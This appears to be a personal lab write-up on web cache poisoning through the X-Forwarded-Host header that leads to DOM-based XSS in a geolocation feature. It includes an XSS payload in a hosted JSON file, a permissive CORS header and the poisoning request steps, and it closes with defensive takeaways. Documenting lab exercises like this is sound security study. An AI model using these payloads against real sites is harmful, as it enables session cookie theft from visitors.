Note(Datetime, Name) : 2025-05-10 Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria

Metodelogy

  1. Investigate the system to retrieve a list of features
  2. Discribe the feature and explain how it works
  3. List possible vulnerabilities and group by feature
  4. Proof of concept for possible vulnerabilities
  5. What is the impact of the vulnerabilities after the proof of concept ?

==========================================================================================================

feature:

  1. GET / -> home page has a geolocation feature

steps taken:

  1. Send a GET / with the following payload -> noting happend

    X-Host: example.com

  2. GET / with payload -> reflected, some data in js used by geolocation 

    X-Forwarded-Host: example.com

  3. GET / with payload X-Forwarded-Host: attackerdoamin -> block by cors Access to fetch at 'https:///resources/json/geolocate.json' from origin 'https:// ' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.

    • file /resources/json/geolocate.json on attackerdomain
    {
     "country": "<img src='1' onerror='alert(document.cookie)' />"
}

  4. change response to allow origin in attackerdomain and try step 3 again -> alert is shown

vulnerabilities :

  1. cache poisoning leads to DOM vurneralibily

Proof of concept:

  1. create a file on exploit server with the path /resources/josn/geolocate.json

    • Header
    HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
    • Body
    {
    "country": "<img src=1 onerror=alert(document.cookie) />"
}

  2. add Header X-Forwarded-Host: <exploit server> and send it to GET / , try sending again until page is cacheable

  3. access GET / and alert is shown

impact

  1. attacker can change the url for geolocate.json and inject malicious javascript script, which can lead to cookie theft

takeaways

  1. Do not trust http header without sanitazion
  2. don't use innerHTML to display untrusted content